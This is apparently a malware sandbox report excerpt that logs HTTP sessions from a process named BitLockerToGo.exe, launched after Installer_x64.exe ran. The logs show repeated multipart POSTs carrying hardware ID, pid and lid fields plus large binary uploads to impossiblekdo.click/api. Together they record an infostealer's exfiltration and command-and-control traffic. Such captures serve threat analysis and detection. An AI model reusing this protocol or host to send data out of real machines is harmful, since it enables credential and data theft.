2025-01-05 18:42:34 UTC	15036	OUT	Data Raw: 2d 2d 4a 45 4e 35 47 37 56 45 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 31 37 37 36 44 34 36 39 38 32 34 44 41 33 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 4a 45 4e 35 47 37 56 45 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 45 4e 35 47 37 56 45 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 4a 45 4e 35 47 37 56 45 4f 4b 0d 0a 43 Data Ascii: --JEN5G7VEOKContent-Disposition: form-data; name="hwid"6A1776D469824DA3889EEA882476AC8E--JEN5G7VEOKContent-Disposition: form-data; name="pid"2--JEN5G7VEOKContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--JEN5G7VEOKC
2025-01-05 18:42:34 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:42:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o1kf0g6g1dmo2qu9k4i6s03a75; expires=Thu, 01 May 2025 12:29:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DrV%2BqMN%2BGjsJUoTB8TExVpkJiH4o%2BH1SGIAORj%2BV6ZjE12SLBp0%2FdW52XTS5Hf7goc2RgCEGVLF0Nc6gh5Shi%2FgAqzdefFMaaasHnj49VD8LwMtGRmvK5nwvicr7uYpVKkUTlLGH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59be33c230cb4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1704&min_rtt=1695&rtt_var=642&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2848&recv_bytes=15971&delivery_rate=1722713&cwnd=245&unsent_bytes=0&cid=4216acf6bc3922bf&ts=512&x=0"
2025-01-05 18:42:34 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:42:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49818	188.114.97.3	443	6204	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:42:35 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UBVFDPPBR0X0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20538 Host: impossiblekdo.click
2025-01-05 18:42:35 UTC	15331	OUT	Data Raw: 2d 2d 55 42 56 46 44 50 50 42 52 30 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 31 37 37 36 44 34 36 39 38 32 34 44 41 33 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 55 42 56 46 44 50 50 42 52 30 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 42 56 46 44 50 50 42 52 30 58 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 55 42 56 46 44 50 50 Data Ascii: --UBVFDPPBR0X0Content-Disposition: form-data; name="hwid"6A1776D469824DA3889EEA882476AC8E--UBVFDPPBR0X0Content-Disposition: form-data; name="pid"3--UBVFDPPBR0X0Content-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--UBVFDPP
2025-01-05 18:42:35 UTC	5207	OUT	Data Raw: b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Wun 4F([:7s~X`nO`i
2025-01-05 18:42:35 UTC	1127	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:42:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fqutdq5n0nricesjke6nnckj4f; expires=Thu, 01 May 2025 12:29:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VQxCmgvQP9p%2BvtnQGzfTRxFSJsnitaJHgK97RnxISjFBfxSs7sR9B1hXG460oe0gmEnnhc%2BkZgKngdnBLEXLgUSMBARmTpEFGkVGuDfcemYZJy0QMnfBygMo0qPEUGjZXxsgGkY4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59beaba82de93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1453&rtt_var=563&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21497&delivery_rate=1912246&cwnd=248&unsent_bytes=0&cid=c3b28996ddc14e86&ts=671&x=0"
2025-01-05 18:42:35 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:42:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49831	188.114.97.3	443	6204	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:42:37 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=TWLP9VBGNLT8UVU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 971 Host: impossiblekdo.click
2025-01-05 18:42:37 UTC	971	OUT	Data Raw: 2d 2d 54 57 4c 50 39 56 42 47 4e 4c 54 38 55 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 31 37 37 36 44 34 36 39 38 32 34 44 41 33 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 54 57 4c 50 39 56 42 47 4e 4c 54 38 55 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 54 57 4c 50 39 56 42 47 4e 4c 54 38 55 56 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a Data Ascii: --TWLP9VBGNLT8UVUContent-Disposition: form-data; name="hwid"6A1776D469824DA3889EEA882476AC8E--TWLP9VBGNLT8UVUContent-Disposition: form-data; name="pid"1--TWLP9VBGNLT8UVUContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf
2025-01-05 18:42:37 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:42:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=pad6uaoceeev782cdd09pa7kfs; expires=Thu, 01 May 2025 12:29:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XJ2eM7doXEr1NUsb%2BLpBqIbeBd%2BHxwiBgEZheWB49TEF%2FAabtugDA6xSD%2BJsXW%2B4wHIyeqCnmgYnykmk51mZzYdw2UuX%2Fwgt3NyJ8P5TgUftHZuTyDAFDivp0IKUOQTGtCz6vZ%2Fs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59bf5d868f5f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1645&rtt_var=633&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=1887&delivery_rate=1706604&cwnd=103&unsent_bytes=0&cid=f2cd9c6b49e55291&ts=472&x=0"
2025-01-05 18:42:37 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:42:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49841	188.114.97.3	443	6204	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:42:38 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=A334Y2C3OX8ZBVTGI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 570271 Host: impossiblekdo.click
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: 2d 2d 41 33 33 34 59 32 43 33 4f 58 38 5a 42 56 54 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 31 37 37 36 44 34 36 39 38 32 34 44 41 33 38 38 39 45 45 41 38 38 32 34 37 36 41 43 38 45 0d 0a 2d 2d 41 33 33 34 59 32 43 33 4f 58 38 5a 42 56 54 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 33 33 34 59 32 43 33 4f 58 38 5a 42 56 54 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a Data Ascii: --A334Y2C3OX8ZBVTGIContent-Disposition: form-data; name="hwid"6A1776D469824DA3889EEA882476AC8E--A334Y2C3OX8ZBVTGIContent-Disposition: form-data; name="pid"1--A334Y2C3OX8ZBVTGIContent-Disposition: form-data; name="lid"LPnhqo--jqmircmz
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: 1f 91 84 4b ef 15 a0 2c 34 8b 47 bf 26 f3 ff 28 b9 55 e2 50 17 56 f3 ac e2 ee aa 27 04 b2 ff 45 91 d0 5c d4 f6 02 3a ac 4e 69 f1 e2 06 7d 2f a8 9e fa f6 ff ef 1d 47 5e f6 01 d9 25 cd df fb 89 5c f0 49 0b bf 4d 03 9a 86 51 4f 2c e8 24 99 0c 2b 6d 2c 7c 19 8e 02 d4 4f d6 19 5f 14 c9 cb f4 74 b5 5b 48 e6 24 2d e8 8e 01 ef db 3a f3 b4 50 b0 52 dd b6 bb 89 12 fe a0 59 15 45 4e d7 06 84 1f e0 ba b9 d0 e6 d7 1f e8 a1 17 1e 85 d2 e4 72 34 18 d5 1b 68 a1 3a 35 c3 47 9f 33 8a 36 b2 5a 74 51 6b 7b 3c 68 be e8 3b f6 74 14 29 6d 33 9b 3e 28 da 7e 41 a4 7c c7 77 5d 61 2c de 6f 58 38 d8 88 79 a2 c7 bf c7 35 19 1b 6f 78 fb 36 08 07 91 12 e0 6a 57 4b 4e 7e 07 ba e7 09 dc 2b 38 75 18 bc 74 13 a6 2d 8f 51 b9 4f 0c 27 de fd a0 f1 03 69 05 21 cf 5a f7 75 05 96 49 70 c8 bd c0 Data Ascii: K,4G&(UPV'E\:Ni}/G^%\IMQO,$+m,\|O_t[H$-:PRYENr4h:5G36ZtQk{<h;t)m3>(~A\|w]a,oX8y5ox6jWKN~+8ut-QO'i!ZuIp
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: bd 34 a8 fe fe 65 c3 5b 0a 90 16 37 fb 6b 2c 2b d6 d4 1c 2f 4e 22 39 ae ea 5d ea d5 e0 f7 c1 37 1b 65 3c 47 ff a6 0f 57 5f 7e 36 d2 27 38 6b fb c5 8e 75 4e 84 a9 62 33 1f 56 b3 81 d5 99 99 7b e4 f9 e3 fe 59 2e 77 a8 04 30 5f a7 55 89 81 ea 6d 7e 40 1b 93 24 39 65 3b 3b 49 83 6d e7 ff 47 dc f8 c1 1b 55 b0 68 08 16 2b 02 2e 22 53 8e 00 dc 2f 61 be fd 9f 33 3b 71 11 f5 2d 17 6d 85 c4 87 34 8a 2a 42 11 68 22 28 1e 17 60 e5 ec e4 38 e1 3c 1c ae c7 68 1b f5 1a cb 62 47 08 a8 47 7a f1 83 e0 63 92 19 2a eb 87 fe f5 4d 29 79 da 4a 89 c4 15 a0 48 8e 93 36 9f 5e 34 5d f6 66 db ce 28 80 8c c7 51 05 50 8a 9b 2f e2 44 5b 2d 28 29 bc 87 56 b9 a6 0b 6a d7 ea 76 5f 70 25 4c a3 13 7e 2e 4b fd a8 e3 85 08 0f 8c 6d b6 44 1e a0 25 ff 34 cd cd 52 bb f0 eb fc b2 bc 3d 15 0e c6 Data Ascii: 4e[7k,+/N"9]7e<GW_~6'8kuNb3V{Y.w0_Um~@$9e;;ImGUh+."S/a3;q-m4Bh"(`8<hbGGzcM)yJH6^4]f(QP/D[-()Vjv_p%L~.KmD%4R=
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: bc 07 33 fb 14 ee b2 d9 0b d1 88 c4 bf cb 9e 4a a1 84 cd b8 93 45 50 3e e6 72 a2 ad 44 d9 b9 7a 41 50 8a 40 3c c2 d5 fc 50 07 39 f8 c2 c1 0f 89 e9 b8 3c be 69 75 30 ab 3b f3 a4 e2 3a 0a 94 68 44 fe 5b 5d f9 4e a5 04 09 54 04 00 1f 14 b0 83 db 89 c2 de b7 a2 3e f2 e0 bb bf f7 60 c0 d3 b7 37 87 b5 be 4f 0c dd 56 80 ef 58 9e 3c a6 0a 66 b7 46 97 c3 ef d4 ac 5e f9 bb cc d9 07 d5 9c e5 a8 d7 c6 9f 85 19 29 00 2e 92 f6 0e bb 71 b9 e6 9c f7 06 d4 f9 a4 8d ad 2c 1d 07 aa dd 0f 78 7f bd f3 cc 05 1b 5f 9b a8 07 66 da 40 64 b1 88 16 c7 7b 17 b3 5e 97 82 87 32 f5 a0 08 14 f8 9b db 00 88 bd 5f 71 de 58 89 6d b7 97 3f 6f 05 1c 53 31 9f 58 1e 13 24 02 02 b5 26 59 d9 0a fa bb 33 f3 84 2e 29 23 dc 24 bc a6 77 48 5a f0 23 4d 9d 77 e9 9b 3c 59 8f de d1 18 e5 02 1e 76 68 5c Data Ascii: 3JEP>rDzAP@<P9<iu0;:hD[]NT>`7OVX<fF^).q,x_f@d{^2_qXm?oS1X$&Y3.)#$wHZ#Mw<Yvh\
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: 13 2f ee 30 cb e2 81 b9 63 db 80 f8 6f 56 a6 51 71 5f 92 2f f3 b0 70 ab 4c 18 b7 57 f4 9a 75 66 2f 8a 14 23 94 da 79 cf f5 e0 5e e3 3b 4b 91 07 c0 47 21 ea 6d af 9d fe db b5 4b 66 bd 68 18 bd 79 94 d1 ea ff 6c 8b 8c 8a f2 db bc f6 bb 20 5e d0 b7 43 32 b6 61 31 81 07 5f 8a 42 9d 21 49 91 b1 8b df d7 d0 8b d1 fb 34 6a f1 99 38 87 70 18 86 ef 7a f3 22 06 58 dd d7 3c 14 1a 90 ab 2f 8b 13 be 3b 02 23 13 a3 c6 08 ed 6d 0f 37 84 d8 ce b3 fc 4c 89 8f df 59 6e 14 3b 51 6e cc 1c 9e 3a e2 c6 85 22 1c 0c d0 3d 99 b8 21 05 de b9 14 7a 9d 26 3a 62 78 ef 3e 0f 95 59 f9 b5 45 4e 95 31 07 cd 31 1a f4 e5 ef 5b 66 7b 33 f5 36 4c 8a 9c 78 a2 95 30 4d c5 4c e1 e1 03 77 9c 6a d3 79 c2 4a b3 92 3f 7c 27 85 0d 23 4d ad 11 2f 0a 2d d3 28 fc 9c c0 bb 1d 65 3b d7 63 9f c1 ed 6b 1b Data Ascii: /0coVQq_/pLWuf/#y^;KG!mKfhyl ^C2a1_B!I4j8pz"X</;#m7LYn;Qn:"=!z&:bx>YEN11[f{36Lx0MLwjyJ?\|'#M/-(e;ck
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: 91 20 f5 b7 52 38 b0 9b b3 98 ab d9 45 bd ce 2d 70 6c 6e 08 a7 21 41 c7 5b 78 12 d7 69 00 23 be 5b 85 51 2d f9 48 21 6d 8f 00 df bb c8 9e f9 cf ff 8a 34 9a 38 e1 1a cb 7a 09 de 02 87 bc d9 5d a6 4e a9 52 8f d6 90 b4 f6 bf b6 b9 ef c1 55 6c bb cd 98 42 cb 10 89 e1 84 8b e0 f2 50 12 ea 03 f1 bc fd 78 96 06 1e 9a 8e 1b 41 b8 5c 34 d7 35 32 65 5d eb 1c c3 02 02 06 68 62 20 4f 71 63 5a 42 05 10 d6 06 7f f6 6d 0b 65 3a d1 e7 93 19 35 c6 80 6d 5f 3e 77 1c c5 68 37 94 62 9a 55 01 13 50 6b 88 83 5d 33 9a c1 7c 36 9e 56 d1 6e 62 4a 3c 0d d6 07 1e fb 3e 5a 05 a9 6d e4 ca 8d 90 29 60 0f 26 3c 14 c4 80 e6 65 33 ca 6e d8 04 d4 4b 2f 1f f0 25 8b 1f 98 d3 9f 66 28 1d 92 46 c2 3a 77 24 e2 8b 65 24 bc b0 b0 b3 d7 43 7a 37 62 50 5f e1 40 22 0d c7 fc 2a 02 34 30 48 6d 1a c2 Data Ascii: R8E-pln!A[xi#[Q-H!m48z]NRUlBPxA\452e]hb OqcZBme:5m_>wh7bUPk]3\|6VnbJ<>Zm)`&<e3nK/%f(F:w$e$Cz7bP_@"*40Hm
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: a8 44 1b 8a c6 08 49 dc 1b 6a f0 9e 2a c9 e0 e4 b5 07 e1 2e 0b 68 47 e3 18 2a 08 72 a3 76 a2 88 b3 15 4f 5a f8 c0 8e 5a 95 d1 13 5d 4a c5 49 0b e6 fc 9c 69 41 8a c3 62 cc be ff 82 42 48 99 43 7f 07 45 40 a0 e5 6d 04 26 0c 13 e3 5c 56 da 5e b9 7a a6 e5 2c 41 72 2f a2 b8 58 97 8e 27 35 fe c5 8e 4e 87 d2 2e 71 b1 eb 88 42 98 6e 69 77 81 28 ef a2 f9 40 ce 97 f6 5a d9 ba a5 1b 35 4f 78 eb 0b 3b 65 20 a0 68 1c d6 71 58 20 4f 16 d4 8f 98 64 21 4b 31 85 f7 d9 68 fc 37 d7 90 7d 75 eb bd e9 9f 9c b5 e1 b5 73 51 7a f5 3c b7 41 79 d8 cf 94 f3 25 3f a4 af 50 66 7d 6b 6c fd 1c 2f 7b 1b 48 a3 d0 cf 32 b2 50 8c 92 63 27 80 67 8c a2 4b cc fa 9c fa 30 bd 8a 6c b8 9d c1 ba 22 bf f5 38 f2 7f de a5 9e 4d 95 68 f7 81 98 3a 6c 4d 99 c3 3d 28 c6 c7 97 f1 36 42 6c a0 b2 dd c5 2b Data Ascii: DIj.hGrvOZZ]JIiAbBHCE@m&\V^z,Ar/X'5N.qBniw(@Z5Ox;e hqX Od!K1h7}usQz<Ay%?Pf}kl/{H2Pc'gK0l"8Mh:lM=(6Bl+
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: 9e ef ae f8 ca 29 4e 12 d8 05 54 9b c2 b1 a0 d9 43 90 35 85 01 92 67 32 c3 9e 3d 4c 3d a9 5e 77 72 9e 66 01 07 8c 92 24 94 72 6e 5f b1 7f 43 fa 48 75 80 a8 03 5f c5 88 3b 9a 22 d6 4b 33 21 fc 18 09 22 27 f7 12 0a 92 a9 6a 5c a6 21 55 0d ad 52 81 5d 8f c8 c2 4a 9f 23 1c 88 6a 85 a3 cd 24 63 f0 8b 72 b7 f3 7d fb db 70 c7 f3 f3 4a 68 ed f8 c7 b6 47 14 a2 75 f3 3c 53 35 53 db 91 6c 29 09 8c 38 8d 41 7c 96 43 1b 41 18 df ec 4a b4 ad 16 fa fb 4a 5a 74 f8 15 85 b1 8d 0b 87 7a 2a 78 84 92 41 79 c1 e7 e8 54 14 17 cd 8c 91 5e f8 9d 49 c5 c2 b1 b1 98 90 c9 c9 af 65 df 12 29 35 96 38 72 3b 3f 4e 4b 3a d8 32 77 bf 34 2b 65 eb e6 58 58 05 e0 a5 c8 80 dc 1f b9 13 a6 5a c4 40 f3 80 27 cd fe 2d db ae 47 e9 2c c7 68 99 3a 7d 34 51 8c 52 70 0e 2f 17 34 ef 87 6f 57 62 25 c0 Data Ascii: )NTC5g2=L=^wrf$rn_CHu_;"K3!"'j\!UR]J#j$cr}pJhGu<S5Sl)8A\|CAJJZtz*xAyT^Ie)58r;?NK:2w4+eXXZ@'-G,h:}4QRp/4oWb%
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: 80 09 ee d7 2e 57 53 ca 94 7c e2 58 76 07 a6 25 1b 91 a6 51 2e 99 63 38 b6 d3 2c e6 db bf c4 f6 8d af 62 c4 e8 86 93 6a 8c 44 be bc d9 f8 3d 44 11 b4 a5 51 fa 16 a6 72 9f 32 1e b1 d0 22 a1 3d 92 6d 35 f6 23 c6 e5 7c 53 82 26 b5 f1 73 8f 3d 6d ea 4f 9f 27 0d ac b5 47 97 1e 19 a9 c9 54 ce 4f ae db a6 43 fb a7 3e 3e 60 c3 57 04 a2 55 a7 a1 29 49 1b 5f 56 f2 8a 8f 08 50 bf 49 24 e8 45 a8 ae 32 ab 29 16 f0 db c2 52 10 a0 f1 57 50 8e cf 36 ea 21 b5 13 bc b6 66 b4 6d 0d f6 83 56 9f 00 1a 7d 75 a8 23 b5 0a f0 f3 2e 66 6f 78 67 ce e5 c1 47 7e c2 b6 6a f5 0e 5b 4c d9 ae 09 2b a3 58 72 e2 46 c3 ca 1b b4 b1 41 d0 af 27 e7 96 8f 3e fb 93 e2 a6 65 60 a3 44 9e fb 89 a4 17 82 7f 14 12 09 3f 97 7a 50 ff ed b2 aa 50 43 33 26 ae 26 fd bf a3 f9 7f d3 e6 84 1e 4d f8 a2 fe d8 Data Ascii: .WS\|Xv%Q.c8,bjD=DQr2"=m5#\|S&s=mO'GTOC>>`WU)I_VPI$E2)RWP6!fmV}u#.foxgG~j[L+XrFA'>e`D?zPPC3&&M
2025-01-05 18:42:38 UTC	15331	OUT	Data Raw: 45 7c 8f 30 08 14 c0 ab 81 4c 1f a2 bd dc 76 4c 62 61 bd 0a 06 7e f9 b0 fe ec ce 98 88 67 e3 3e 4a bd 37 94 33 43 d4 9c a2 b2 00 f5 b9 aa 98 97 09 ed 2b 97 12 91 22 06 5a 03 04 b8 c7 40 b1 aa a2 97 73 24 81 c8 0f 42 2e 11 d9 82 e0 38 0e 99 4f 3b a4 dc 42 f0 08 5f 40 bd 06 a9 4c 8d 09 3e 71 60 b5 43 37 36 5a f4 1a 2a 85 e3 79 be 07 d1 0f c3 f8 d6 f8 63 22 6d b8 d7 30 82 f7 4f 49 1f bb e7 17 49 df a8 87 d2 a3 de c5 0b 10 35 19 75 ca 91 a4 51 10 88 02 f1 87 e4 75 25 84 ae 5a a4 84 3d 86 d6 b9 da 39 34 38 26 5e fc c9 51 57 40 7d b0 69 23 4e 0f a6 8f 29 64 96 61 44 dc 8d 34 38 39 3f 11 9a a9 8f e2 e7 f5 10 11 fc b4 07 5d fc a0 8a f7 61 b8 4e 05 97 d3 be a6 dc f7 f5 61 ca 9e 79 05 10 06 22 0d e4 2f 47 c2 57 62 23 13 51 23 8a 54 f2 a3 86 9e 14 23 dd 73 64 fa 09 Data Ascii: E\|0LvLba~g>J73C+"Z@s$B.8O;B_@L>q`C76Z*yc"m0OII5uQu%Z=948&^QW@}i#N)daD489?]aNay"/GWb#Q#T#sd
2025-01-05 18:42:41 UTC	1135	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:42:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dcuh5gfoinq99ioc94evsm9rme; expires=Thu, 01 May 2025 12:29:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KHFiHizfOLNHZX1YQxOAHZjqrAkzUIPo0lJtysxhWSwIjG8KYwDmUOuALjAYIj%2FgNHhxEuH9UQzvDMVewNulolcbwmL%2F1OzWg7d4hlT%2BJUq3%2BEPML3JOisgj4JowewIZQdjLvO0H"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59bfece284243-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1668&min_rtt=1657&rtt_var=643&sent=199&recv=579&lost=0&retrans=0&sent_bytes=2847&recv_bytes=572820&delivery_rate=1672394&cwnd=193&unsent_bytes=0&cid=cde2fc2b9dd08a87&ts=2819&x=0"

Target ID:	0
Start time:	13:41:57
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\Installer_x64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Installer_x64.exe"
Imagebase:	0xc40000
File size:	11'749'376 bytes
MD5 hash:	9DEF2AB28D008FDCB73A0AA8E9E9D429
Has elevated privileges:	true
